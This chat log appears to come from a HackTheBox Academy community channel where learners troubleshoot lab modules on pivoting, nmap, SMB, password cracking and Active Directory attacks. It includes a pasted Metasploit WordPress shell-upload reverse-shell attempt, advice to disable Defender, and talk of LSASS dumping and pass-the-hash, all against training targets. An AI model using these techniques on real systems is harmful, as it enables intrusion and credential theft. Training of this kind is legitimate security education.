or what am I doing wrong here?

this is for question 3

can someone help me out here?

I haven't started that module although you could increase nmap timing with -T (higher is faster 5, but IRL I think IDS/IPS (firewalls etc etc) could pick up on the speed increase)

I think in the module there's a firewall picking it up

other scans got all filtered results that's the only scan that shows 64 hosts up instead of 255

or where any ports are not filtered

ya I am wondering if maybe I should just wait this one out

well now that module sounds real fun hahahaha I wish I could be more helpful but still a noob

well if remember correctly those VM/boxes in academy last for 120 minutes

well I already expanded the time

😮

so I know that but you can expand the time a certain number of times

and then they just force you to start a new instance

Sorry to jump in the convo. But do you need to extend time if you are connected to the VPN so the box does expire if you are mid exploit?

it can happen

no on VPN you have until the target dies which also can be expanded

I'm using a VM with VPN tho

happened to me earlier on hahahaha time limits lol

Don't spoil info for modules above t0

And you just expand the time in the browser for the target right?

I didn't mean to sorry

ICMP and socks proxy don't tend to get along

Yes

ya so that's why I'm doing it with -Pn involved

@fathom pendant can you tell me if I'm doing the module wrong and if so what am I doing wrong?

or do I just need to wait it out

Does anything change with sudo?

Hello, I'm on Module Active Directory Enumeration & Attacks and stuck on Question " Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain." Can anyone help?

I haven't touched that module in a while

ok can you check it out?

Run the powershell/cmd as admin

No.

thx. that did it

Ok how do I get help with it?

that reminds me of a meme

I have tried a whole bunch of scans and chatting it

Wait for someone else to help i guess

Ok will I need to repost?

Sorry typo

Well you reposting would include spoiler info, you can drop the scan info and just explain your issue

Ok thanks

Instead of copying the whole log

So just everything after the command?

And vaguely describe what I’m doing?

Yep, don't forget the module and section

ok thanks

hi so this is for question 3 of the skills assessment section for pivoting, tunneling, and port forwarding. I am trying to route everything through proxychains in order to get it through the pivot server in the section. I already know how to ssh into the pivot server so that's not the issue. the issue is my scans tend to either take forever or show every single host as up with all ports filtered.

In order to bypass the firewall, I changed the scan in order to not show all hosts as up with all ports filtered. this slows the scan down but I'm wondering if even this is the right scan. To me, its more likely because about a quarter of the hosts in the subnet show as up but the scan is taking much longer and I don't know if I should keep waiting for the scan to finish or try a different scan:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 15:10 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.04% done
Stats: 0:00:06 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.23% done
Stats: 0:00:10 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.39% done
Stats: 0:00:13 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.51% done
Stats: 0:00:17 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.66% done
Stats: 0:02:36 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 6.02% done; ETC: 15:53 (0:40:37 remaining)
Stats: 0:02:42 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 6.25% done; ETC: 15:53 (0:40:30 remaining)
Stats: 0:03:33 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 8.24% done; ETC: 15:53 (0:39:31 remaining)
Stats: 0:04:19 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 10.04% done; ETC: 15:53 (0:38:50 remaining)
Stats: 0:04:54 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 11.41% done; ETC: 15:53 (0:38:11 remaining)
Stats: 0:05:33 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 12.89% done; ETC: 15:53 (0:37:30 remaining)
Stats: 0:05:48 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 13.48% done; ETC: 15:53 (0:37:14 remaining)
Stats: 0:06:25 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 15:53 (0:36:35 remaining)
Stats: 0:06:28 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 15.04% done; ETC: 15:53 (0:36:32 remaining)
Stats: 0:07:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 17.15% done; ETC: 15:53 (0:35:40 remaining)
Stats: 0:08:43 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 20.27% done; ETC: 15:53 (0:34:17 remaining)
Stats: 0:12:53 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 30.00% done; ETC: 15:53 (0:30:06 remaining)

That's the output from my scan (or most of it anyways). Do I have the right idea with this scan and should I wait for it to finish? I need the IPs of hosts that are up and connected to the pivot server from the internal network.

there's 254 hosts total in scan and since 64 are up I think that means its hopefully not gonna just show me all results as filtered right?

the 254 hosts total is my estimate for the size of the scan. theoretically, I could have scanned a larger range but I'm scared the scan would never complete.

Can someone tell me what I'm doing wrong or if I'm actually right to be doing the scan the way I did it?

I havent done this lab but the last line in the CLI says 30% completed. And it looks like it was only running for 13 minutes. I guess wait for it to finish at that pace it should be done in an hour or so

I'm looking for someone who knows how to do pivoting, tunneling, and port forwarding to answer

or at least who has done this lab

Yup, thats not me. Sorry, best of luck friend

nope all of it is filtered after all of that

I'll get back to it later then

I ought to take a break now

You never really asked a question. You just said you were stuck on question 3 and showed your scan taking forever. You didn't provide context as to why you're running this scan and you seem to assume it's required. Maybe it's not, but no one knows because you didn't really say what you were trying to accomplish. If you're trying to find if hosts are up, there are other techniques the module mentioned beyond nmap that may help you.

If you're scanning 253 hosts and all 65,535 ports you're going to wait a long time to get those results back.

fping any good? for hosts?

with what?

Yo, quick question, for the red teaming ai; Applications of AI in InfoSec; Skills assessment, Ive submitted a 93% accuracy score and it wasnt accepted? Im kinda hoping that the 4GM RAM and 4 CPU's here wont take a week to train for anything higher. Any guidance?

Hello I need help with using web proxies sections covering:
Repeating requests
Burp intruder

For repeating requests i found both flags but when i try to submit them it says its wrong.

For Burp intruder im lost i followed the hint my set up for it is the same as explained on the page but it is still not working and all the pages have a 404 error code.

No. Not what this discord is about. This is not a hacker for hire server.

What it's than?

For discussion about the various HackTheBox platforms.

Oooooo

What are the recommended settings for generating ssh keys? I've seen a few examples of ssh-keygen on academy and all of them use slightly different settings.

Probably depends on who is recommending the settings to you.

Are there some general guidelines on x algorithm is most commonly used nowadays? I have seen some instances where rsa with various bits are used or ed25519.

I just follow githubs advice: https://docs.github.com/en/enterprise-cloud@latest/authentication/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent#generating-a-new-ssh-key

Seems like they would have an interest in having the most up to date docs

The takeaway I got from some articles I read is that some old clients might not support ed25519 (could they really not come up with a better name?)

But I don't know how old, old is

If you come across and old system then just generate a new key and use both. One fore the latest and greatest alg and one for old legacy.

yeah makes sense

would you actually be able to tell the performance benefits from using a different algorithm, I can't recall ever having to wait a significant amount of time for an ssh interaction

Nope, you won't notice a difference, its just the latest and greatest recommended.

I had reduced it to top 20 popular port numbers. Regardless, I was asking because I thought I needed to pivot off the ubuntu server to port scan any of the hosts in the network to get their IP. Should I try a different method?

I wanted to know if I had the right approach by proxy chaining nmap?

Or if I was using the wrong method

++ throwing errors and problems like a canon

There are multiple ways to do things. If one method isn't yielding any results, why wouldn't you try something else?

Point taken I will try something else. I was just curious if there’s even a way to do it with nmap

But I see your point I’ll try something else

well you still never really said what you're trying to do. you just said you're on question 3 and showed your nmap scan.

From the full module my favorite tool is sshuttle no need of proxychains just one command work done

@quasi wave try this method

Hi, I'm working on the Attacking Common Applications module, Attacking Wordpress section.

I'm trying to use metasploit to gain a reverse shell on the target through the wp_admin_shell_upload exploit. I have manually checked and confirmed the credentials and that the user I have is an Administrator for the site. However, I can't seem to get the exploit to work:

LHOST => 10.10.14.186
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.129.247.196
RHOSTS => 10.129.247.196
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME ****
USERNAME => ****
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ****
PASSWORD => ****
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 10.10.14.186:4444 
[*] Authenticating with WordPress using ****:****...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

Am I missing something?

Im still here. Dying. Everything else is done, still stuck in stage 2 of the assessment for intro to windbg. If anyone has any tips im all ears. I don't know if anyone has beat this yet but i am starting to feel there maybe an issue with .run file.

My issue with that is I want to actually gain a good understanding of what I’m doing

But I’ll possibly try it

Good

Currently I’m resting as my muscles hurt from two days of boxing

Wow, I also want to learn boxing

will join a traning center soon boxing or second option swimming

There's no issue with the .run file

Also make sure to retrieve it as explained in the challenge instructions

Hey all I had a question. Using the VM when you are finding the output of a flag. What have you found is the best way to copy and paste it into your local browser HTB to answer the questions.

They are a long string so I dont want to sit here and type it but copy and paste does not work between the local host and the VM

At least how I am doing it I guess

works for me. i use vmware and vm tools are installed on the client. could also just open htb on the vm itself so you don't need to share clipboard.

Ya I use Vmware too but it doesnt work for me. I think thats a good work around thanks @cloud urchin Ill post if I find a better solution

and you installed vmware tools on the client?

How do I verify?

in vmware workstation go to vm -> install vmware tools

Ok so in the actual hypervisor outside of the VM > Edit Virtual machine settings > Options tab > Vmware tools
Right?

in mine it's just vm -> install vmware tools

that inserts a disk you can install from

also there's this https://www.kali.org/docs/virtualization/install-vmware-guest-tools/

Mine is set to "use application default"

I am using the HTB Parrot Linux OS

i don't use parrot so it may be different but it's still debian based. google is your friend here. but you need guest tools installed for your hypervisor to share the clipboard with your host i believe.

Thanks!

So I did the following incase anyone else is wondering:
1.
sudo apt update
sudo apt install open-vm-tools open-vm-tools-desktop -y

sudo reboot - Restart VM

Stop VM

Before starting your VM, do this in VMware Workstation or Player:
Go to your VM > Edit virtual machine settings
Click the Options tab
Go to Guest Isolation

Check both:
☑ Enable copy and paste
☑ Enable drag and drop
Click OK and start your VM.

Worked!

@cloud urchin Hello I have access Nibbles machine from VIP lab and solved it . However user.txt and root.txt flag for VIP are not applicable for Academy module. I am doing Academy module to complete the path . How can I verify that in Academy module and move forward my lesson . Please advise . Thanks again

1. Mods aren't staff
2. You should look up a guide then and see what differs

The academy module walks through the steps

i can't crack the zip file hash with the specific wordlist

#modules Password Attacks

Mutate the wordlist

Or try rockyou

is rockyou.txt and SecLists really good?

for password cracking

https://tenor.com/view/it-depends-on-the-situation-alex-engvid-depending-on-the-situation-it-depends-on-the-circumstances-gif-27205658

i try it already but same problem

What section?

Oof socks via rdp under pivoting was so time consuming as you have to transfer each tool and then antivirus keep deleting and then from rdp also you have to transfer to another rdp but yea it was good

You have to disable real-time protection

Yea done that

nd we have to run powershell as admin else dll wont load

Just completed it 2m ago now gonna take some rest and then assessment

Did you manage to fix this? I'm running to the issue too. I've looked ahead at the guides, and it should work.
I've also tried passthecert, gives me an ldap shell but the user is "None"

Hold okay

I think the passthecert need when we have a certife for administrator and user the passthecert for add a user to administrator group for dump the hashes but for that user he is not an admin so I think the passthecert will not work. What do you think

yes why?

oh thank you bro

What's happening?

can i join?

yeah

this is weird though, it doesn't mention anywhere that this discord is affiliated with hack thebox

#welcome ; unless you mean that user specifically

https://tenor.com/view/smelly-smells-smell-fishy-amstaff-gif-20722492

yep

[image: them asking me to connect my "wallet api" to the "rpc endpoint", whatever that means]

are you offering support? i could really use some help with something

I've reported him

shhhh 😉

dm me that image

they aren't official support btw, do not trust any of the links sent

hey guys

this isn't #general, if you're looking to talk about random stuff there's a list of instructions in #welcome that tells you how to verify/link your account

Where can I get red teaming ai support?

? you mean help with one of the modules or support because you think something is broken

if it's the first
module name - section name
what you're having issues with

if it's the latter
reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Skill assessment module section 2

Ty

skill assessment isn't a module

it's a section itself

Module 2 then skills assessment

"module 2" isn't helpful either

^^^ then to be specific

Same support link?

support is only if you think the module is bugged out.

Roger

Does anyone have any experience mitigating SeImpersonate. Are there other ways of mitigating beyond revoking privileges or disabling the print spooler?

Hi can someone help me on the web proxie module skill assessment. First question I tried what it told me to do but doesn’t work

I did the rest of the skill assessment just this one doesn’t seem to work for me

Hey, can anyone drop hint of pivoting and Skill assessment question 4

You should post the question with your attempt

Still nothing

I have tried using sshutle for pivot but to no avail can't ping or nmap anything under the pivot host

And the user creds I got earlier didn't work they say wrong creds

It says you're using the wrong creds, so you are reaching the host?

I am talking about the mlefay user which when I try to connect via ssh gives wrong creds error

Ok but that means you're successfully reaching the host correct?

I am trying those creds on the webshell ip only that htb gave because I am unable to pivot from that

It might be problem with sshutle I am trying rpivot didn't work no python present

I'm stuck on exploiting web vulnerabilities on thick clients in the attacking common applications section, and I can never compile my java file like it instructs me too.

Any ideas? I just get 31 errors each time I try

From the sound of it that should be working idk maybe there's something wrong with your command syntax

Nope sshutle is executing properly

Is it something related to metasploit? As they have given hint do I have to launch a payload in my jump machine for pivoting?

In that case maybe the mlefay user doesn't have ssh permissions on the target

Yes it might be possible, but that's not my main concern my main concern is to reach the internal network of my jump host but it's not working

I thought you said sshuttle is working properly and that you preformed a ping sweep

I performed a ping sweep under the jump host
Sshutle ran properly but even after that I am not able to acess the internal network of my jump host

Ah I see what you meant by that, having said that why do you think that sshuttle is configured properly if you can't reach your target ip

Yess

Maybe check iptables to see if sshuttle is successfully adding your target network

Yes it has added in iptables. But still I can't access the webadmin network

Wait I think I can also do ssh dynamic forwarding let me try that if sshutle is not working it might work

Wait I think it worked

ping is not working

Ping doesn't always work. Try a port scan

Yep it worried all ports in ignored state but host is up

Thats definitely odd lol

Tbh I can't think of a reason why that might be

Though sometimes vms can be finicky or appear as up when they aren't

Yea

Yea let me use full handshake one flag and try

@cold star Please do not post content from modules above tier 0

Okay

Glad you got it lol

Nope

Oh

It still all filterd ports

And I tried ssh on both the ips connection refused

Are there other live hosts on this network that you can check against or just this one?

Ping sweep from my jump host gave me 2 but running nmap against entire network gave me a lot of hosts

Hmm I don't have the answer for you. I would suggest trying another method or restarting the environment if nothing else seems to be working

Yep thanks for the help

Also try using ligolo instead. Its good to learn other tools but ligolo is the best hands down

Thanks for the suggestion will try it, but can't execute anything in the jump host I only have ssh keys not proper creds like . /something

You should be able to transfer the ligolo agent with scp if you'd like to try that

Yep but to run ligolo I need permission for that I need pass I don't have that I only got the ssh key

I will try this again after a big nap because my mind is not working clearly studying in hack rhe box from 6 hours

Yeah ik the feeling godspeed 🫡

https://tenor.com/view/cat-dance-cat-dance-gif-20491618

And again thanks for your help

ligolo doesn't need as many perms as you think

only requires admin perms if you're trying to route a port < 1024

Gotcha will try it today after a good 5 hour sleep

Does anyone know how to find a password from a hash without using Hashcat? The wordlist definitely doesn’t contain the correct password. The password has 26 characters, so there are about 4 × 10²⁶ possible combinations.

what module is this for?

Sorry, I put the question into section, it is from CTF not in the modules

if it's from an active CTF, no one can help you. And since it's unrelated to htb academy modules, this isn't the right channel

Thanks

I will keep going

heey everyone

Anyone around that can help with a technical issue for the VPN? Working on a module and the connections aren't letting me in

https://security.stackexchange.com/questions/272191/kerberos-ntlm-password-hashes-questions

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

@arctic ridge ^

Thank you

Hi guy, im stucking at the session Windows Event Logs which is belong to Windows Event Logs & Finding Evil module. i meet this question, and i dont understand that how the Event ID 4624 is related to the modification of the auditing settings?

I already find out the question but not base on the information that i have from Event ID 4624, just want to ask the relationship between these event

the section details how to dig back from that info, step by step

Hello everyone

I need CVE-2020-0668.exe file. I am not in the position to build it myself. Please send it if you have it.

The file was present on the target machine C:\Tools in Kernel Exploits section of Windows Privilege Escalation module.

here's a little lesson in trickery~ i just stole half the stuff i used from the C:\Tools directory in the WPE and AD Enum modules

I am using the Pwnbox provided by the HTB itself and not using my own machine. How can I download the files on my machine that are present on the pwnbox?

so: you can spin up the lab that has it, and download it to your machine then spin up the other lab you may need to use it

also pwnbox has ssh running, so you can use scp to transfer files over

Yes. The problem is I cannot download it to my machine from PwnBox

I can use x method to transfer file from target server(Windows) to PwnBox by HTB(Parrot). Is there a way I can transfer the file from PwnBox(Parrot) to my local?

Now that I have said it out loud. Its silly 😛

scp; the pwnbox has an open-internet facing interface

:D

Thanks

i'm sure you could probably start another service or whatever but that's other inherent risks

(but since it's pwnbox it's not as big a deal)

Hi I’m doing the file upload attacks module and I’m at blacklist filters.
I have been trying to brute force the php extension but I can’t find a matching one. I have tried both the payloadallthething, php list and seclists web extension list. I created a shell with the echo hello world on my machine to see if I could execute on the specific extension but I can’t figure this out. Help please

Hello
I am stuck with this error while working in web applications fuzzing module

This is the parameter fixing section (GET)

I crossed check the port and ip in my hosts file and they are both correct. I don’t know what the issue is

Try sescaping the ? with a \.

Yo that worked. Thanks a lot

Plz help

Have you tried double extension?

@cold star Again, do not post content from modules above tier 0.

Gotcha

Hi I currently just finished the nmap IDS evasion hard module and I was wondering where I could find like write ups or solutions for these modules. I feel like I missed on how to actually figure out which port to scan and just got lucky by facerolling a number

Hi

You could try the forums

@nocturne wolf No. Not what this discord is about.

writeups for any module above tier 0 is against ToS

break down the direct scan => utilize wider scans

Tbf i think the module did a good job at explaining this

"Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer."
Is it normal to do a 1h long nmap scan of 172.16.5.15/16 ?
Im a bit lost on how to discover another active host.
Module link:https://academy.hackthebox.com/module/158/section/1441

never mind😆

anyone finished Planning Machine?

Sounds like you need to ask in #boxes, this channel is for discussion of the various modules on academy.

I don’t have access to that channel

Follow the instructions in #welcome to gain access.

Thanks mod

I have solved it dm me will guide you currently on 5th question

i got it, im also on 5th question ahah

Ah nice let's perform lssas attack becuase I think that's the only way to get services because no AD is active there

yep, im just trying to get the file onto my attack host

use scp for linux one and use share drive feature in xfreerdp

yea we also have to create reverse tunnel there to dump lssass it will take time

yep used drive feature from rdp, don't know why you need reverse tunnel

or use pass the hash

can I dm you?

yh

Guys do you suggest more the penetration tester job Path or the bug bounty hunter

I am working in the beginning of pen test path, working through service scanning. I am on the question:

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on

I am running the scan with nmap -sC -sV -p- <ip address> and I am on my 3rd attempt and it never returns a result before my target runs out of time and i have to respawn it.

Any help?

Would really appreciate some help on the last part of Advanced XSS and CSRF Exploitation assesment, I know what to do but I have some minor mistake in my syntax I think

Penetration tester one first

why

Guys is my build of 1k dollar for my ethical hacking journey is good which includes ryzen 5 5600x, rtx 3060 12gb vram, 32gb ram and 1tb storage

??

probably ¯_(ツ)_/¯

It will cover many web modules

Could anybody please help me solve tge second question in the Automating Payloads & Delivery With Metasploit in the Shells & Payloads module?

I can tell you what I did and where I got stuck but I don't want to spoil it for others if that's not allowed.

Has anyone done the using web proxies modual if so what did you do for repeating requests because i have the two flags but it says its wrong when i try to submit it.

Anyone can help me tho get a TikTok account inactieve I need Somone for help

I have a good offer for the person that can help me out’!

what?

Like THERE is a TikTok account thats needs to get blocked

But I need help for that

this is not tiktok support but here is an article that will help https://support.tiktok.com/en/using-tiktok/followers-and-following/blocking-the-users

please keep the channel on topic, this channel is for discussion of HTB Academy modules

No thats not what I mean I mean can Somone help me tho do it by me self

i linked you the appropriate article, keep the channel on topic

this channel is always full of interesting topic,
is there anyway to speed up or maybe potentially a better tool that smtp-user-enum?
this is for footprinting module SMTP section

Hi everyone. Can anyone recommend a very basic CTF and is it on the main page or academy? Something very easy please.

whats your skills so far? do you know Nmap?
I know support will probably probe for a few questions too to best help you

hello i am in the Pentestin a nutshell module, on the linux pillaging tab. here i am being asked to run linpeas.sh while being root@ubuntu

Hi, thank you for assisting me. I am basically brand new only experience I have currently is knowledge of N+. I have ran an Nmap scan before to check open ports and services and that’s basically the gist of it

however i cannot seem to run linpeas.sh nor am i able to download it

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? (Do you guys know how to get the answer for this ?)

The module/section details how to do this

its alright we were all at little or no skill on each individuals journey I recommend doing some of the academy stuff as it teaches basic stuff but doesn't hold back sometimes hahahaha
https://academy.hackthebox.com/module/details/77
this doesnt hold back but with some OSINT (online searching) it can be achieved beside that pick a module that is fundmental and go from there 😄

Windows Defense & Attacks / Kerberoasting

I enrolled in the pentester oath, I hope that’s ok

GoodLuck and have fun

Thank you Once again for assistance 🙂

Is anyone else facing issues connecting through RDP to any windows machines in the module? Since two days ago I've been constantly getting a black unresponsive screen when running xfreerdp or rdesktop... I clean installed both binaries but nothing really changed. Any idea of why this could be happening?

Press enter

Yeah I mean that didn't solve the issue.. I tried with remmina now and I just got a black screen with reconnection attempts. Not sure what is really going on but I've downloaded the VPN files mutliple times now.

Change to the tcp vpn

Any method ?

I love you. That worked. Thank you!

nevermind didnt know HTB handed out wordlists resources
with a smaller wordlist got it...

I'm struggling to rdp this IP but, somehow I can't figure it out

in the Active Directory Enumeration & Attacks laboratory ACL Enumeration module I have great problems connecting in RDP, is this normal?

Password Attacks
Credential Hunting in Windows

What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

Hello from Greece ,new here 🙂

stuck on a setting up module

its y third time doing it again and again

Yeah just confirm creds

Yoo

this part never comes ?

it takes me again to the installation .

Hey everyone. I'm pretty new to cybersecurity. If anyone has pro-tips or advice, I'd seriously appreciate it! My first module is Linux fundamentals.

Hey from Spain!

You install the os, then reboot, if it doesn't automatically try to boot what is on the disk at that point, either eject the installation media or change the boot order in whatever vm software you use.

Okay

Hi! I'm from Mexico city

Take your time, don't be afraid to google things also take notes

#welcome use this to open up the other channels using the verification section

Anyone happen to know what application or config file contains the shortcut super + t to open the terminal in Parrot? I would like to change the terminal it launches. But it isn't a shortcut listed in the default mate shortcut tool, and the terminal that is being launched doesn't change if I set the defaults via the terminal or use the preferred applications tool.

Have you tred sudo update-alternatives --config?

I have reconfigured update-alternatives for x-terminal-emulator to be the terminal that I want

and rebooted

Has anyone recently done the "password attacks" module? I'm on the password mutations section where I'd need to brute-force the user's password to log-in with SSH and the mutated list has 94k lines been running for +30 mins with Hydra and no hits. Should it really take this long? Hydra estimates it'll take 6 HOURS to go through the whole list !!!

Thanks

maybe there's another way to identify valid credentials

Do you think so? Have you done the exercise?

yes

using oracle virtualbox manager parrotos

hi?

can u help me getting started?

If you don't mind, could you please give me a small nudge to the right direction? Highly appreciated 🤞

you can ask questions if the help you need is regarding Hack the Box modules. Be sure to note the module & section. No spoiling content over tier 0.

you can DM me

ok

*hack the box Academy modules.

Hi currently on the MSSQL, Exchange, and SCCM Attacks Skills Assessment, im having trouble after getting to ||ron.mcginnis||. Have already tried enumerating for database links but im getting ||broken link || errors when using PowerUpSQL and impacket-mssqlclient is not showing anything particularly interesting. unsure if a ||relay attack || is out of scope here due to ||no signing ||

would really appreciate any help thanks!

Hey

Does anyone make any type of compiler tool as a text editor, Which supports all programming languages.

I'm having a problem with the second question in the Windows Attack & Defense Module Kerberoasting section. I already cracked the password, but somehow, I'm struggling to connect to the machine in the second question. Do you have any tips?

Hey, i need help with the Attacking FTP section of Attacking Common Services Module. I did the full TCP port scan but there's no FTP service running on the machine?

I also just ran into this issue. Even following the walkthrough did not show the port in the scan. Then I tried manually connecting with nc and ftp to the port shown in the walkthrough and the port was closed.

Yes, TGS and new session key are encrypted with the old session key

Correct, you can look into the ccache with describeTicket from impacket.

I am having trouble with uploading my working model for the final skills assessment of Applications of AI in InfoSec. The model performs with 90% accuracy locally but every time i upload the saved joblib file for evaluation, I am told it has 0% accuracy. I have refactored it many times to no avail. I did not have this issue with the other 3 models that I had to upload as i progressed through the course. Does anyone know what I could be doing wrong? i emailed HTB support but havent heard back and cant get past this module to continue the learning path

I'm at what seems to be a simple part of the "Getting Started" module in the "Service Scanning" section. I'm trying to connect to the "user" share as Bob. I can list the shares just fine using the command:

smbclient -N -L \\(IP Address)

But when I try to use the command:

smbclient -U bob \\(IP Address)\users

To connect with Bob's credentials I was given (Bob:Welcome1). I get an error (NT_STATUS_NOT_FOUND)

My brain is deteriorating rapidly as I try to figure out what i'm doing wrong, please help if you're able

Can someone help me on the skill assessment question 1 of web proxies module I did all the other one but can’t seem the get the flag from the button

@pale pendant This is not the place to advertise your online store.

Looks to missing a few \ and make sure your connections to the available share

I also tried:
smbclient -U bob ////(IP Address)//users

Which didn't work either. I tried to follow what was done in the example so i'm not sure where things went wrong

skid

@shut sparrow My bad I just checked did you use his password

When I enter the command it asks for his password, I type in "Welcome1" and hit enter, thats when I get the error

The whole double-backslash thing gets confusing fast. I think forward slashes work too without doubling them up (doubling up forward slashes will goof things up I'm pretty sure ////). Wrapping things in single quotes makes it 'literal' and helps too if do really need backslashes.

smbclient -U bob \\\\<ip_addr>\\users
smbclient -U bob //<ip_addr>/users
smbclient -U bob '\\<ip_addre>\users'

I like to test with echo when I get confused

user@boxen:~$ echo //
//
user@boxen:~$ echo \\
\
user@boxen:~$ echo '\\'
\\
user@boxen:~$ 

That's super useful to know, I had no idea why there were so many ways to write it. Even still, I tried most of different formats and none seemed to get me any further than the error after password

@shut sparrow just copy the command from the page and change the ip

I'll give that a try, thanks!

is Bob capitalized? I don't know, you've got something else going on then if it's not confusion over the \\ // etc.

It worked for me just fine I got that error for no password

So make sure the password is correct 😎

I tried lowercase bob and capitalized Bob, same result unfortunately

The password should be "Welcome1" right? I just assumed they gave me the password and I didn't have to find one

That’s the correct password

i'll have to try to set this up on my personal vm because my pwn box is long expired. so we'll see if I can figure that out to test

I spent like an hour doing a ctf that isn't actually the ctf i started

i don't know why i thought using nmap on an ip of a generated ctf would give me 100% targets of the ctf i was doing

but now i have a flag from somewhere i don't know

I have no idea what I did differently but connecting to it on my own vm seemed to finally work and give me the flag. Thank you both for helping me resolve this headache

Hi, i'v just started academy, finished the "tutorial" and is currently working my way through linux fundamentals. after completing the first section of the tutorial there is a toast that says "first steps with HTB academy" "choose path". any takes on wether i should focus on a path or just focus on completing modules from the t0 and t1 tiers to start off, or should i focus more on specific modules tailored towards a specific path.. im currently subbing for the one that gives 200 cubes a month, and dont have to much to spare other then that. so im also somewhat limited by my cubes. any pointers / help to what to start with is very much appreciated. NOTE: i have background as junior backend dev if that is worth anything..

Why not choose a cert to do you will learn a lot CBBH or CPTS

Based on ur background CBBH might be interesting to you

my first reaction was to chase CPTS cert. and that is my first milestone in my plan to break into cyber sec. but also find CBBH extremly intriguing, but read on a reddit post that CBBH was tailored more as an intro and to make a living as a BBH was mega hard.

Well if you choose CPTS you will compete 50% of CBBH no reason why you can’t finish

What makes you say that ☺️

true true. if there is a decent overlap there is no reason not to do both 😄

@viscid osprey that was kinda my question also, what do i need to build a strong foundation? which modules do yall recommend to start off with ?

those kind of fundamentals 😄

Yeah but it’s not practical I think he wants hands on stuff

@viscid osprey I do think that is a good suggestion tho

Even from a job side of things

Iv already done some networking courses on codecademy, currently working as an IT-assistant and trying to absorb as much as i can from my colleagues. also i have a network guru on speed dial for all my network related questions

Iv been eyeing those comptia certs. but dont know how to take them in my country of residence

Honestly, it just depends but I'd take the "Information Security Foundations" path and go from there

Tbh bro I am in IT I know a little and I am doing CPTS and you pick up the terms and things as you

OSCP is super expensive tho and you learn abit more on CPTS

Thanks for all the solid advice, I think ill try focus on CPTS for now, and start there. Better to just do then think about doing. then i can adjust course as i go and get my feet wet.

Before you buy some stuff if you sign up the HTB there is a section called spotlight there free for some of them you can mess around with some stuff

💯 bro I get that I am hoping if I do CPTS my boss will get me OSCP 🤣

Hello all, I'm trying to do the Skills Assessment of the Introduction to Digital Forensics module, I'm on the question 3 (finding the persistence registry key) I think I found it but doesn't work... Can I dm someone ?

i have cubes to buy the beginner course and promised mysefl that if i could get going on this journey for real, id invest into a yearly sub

Subscribe is good if you can stay focused and don’t take a month of other wise your wasting pennies I paid in cubes so I could take my time and research stuff if I don’t fully know something but you do get some benefits if you sub

Hello friends. Not sure where best to report this, but I think the box for the skills assessment in the Cross Site Scripting (XSS) module is having some problems. When testing different payloads in the various fields, I'm just getting a connection reset error every time. I've tried resetting the box thrice and I'm connected via VPN. This has been happening since last night

Try downloading a new vpn. Or try sudo killall openvpn

Thanks, I'll give it a try ~

Hmm. No luck yet... The problem occurs when trying to render http://{SERVER}/assessment/wp-comments-post(dot)php

Idk bout you but pretty sure {server} is not a real site

Have you tried putting the target ip?

Sorry for the confusion, I did use the complete ip while doing the lab, I just redacted it when posting, hahaha

@viscid osprey will do~

This is false

A lot of times especially for web modules like the one he's in

It says if you get a ip with a specific port it’s public

This one actually is 10.x, so probably private... Redaction is just a reflex, probably not necessary in this case

No specific port in this case

I could be wrong it was mentioned in one of the modules

Oh right so you can actually do funni xss things

They wont exactly provide the port if it is private because the port would usually be the default or you'd have to port scan anyways

Hi, guys. I am stuck at the fisrt question of the skill assessment section of the module using crackmapexec. I established the tunnel with chisel and tried to run nxc on the internal network. However, it does not find anything. Does anyone have a clue on what I might be doing wrong?

You can DM

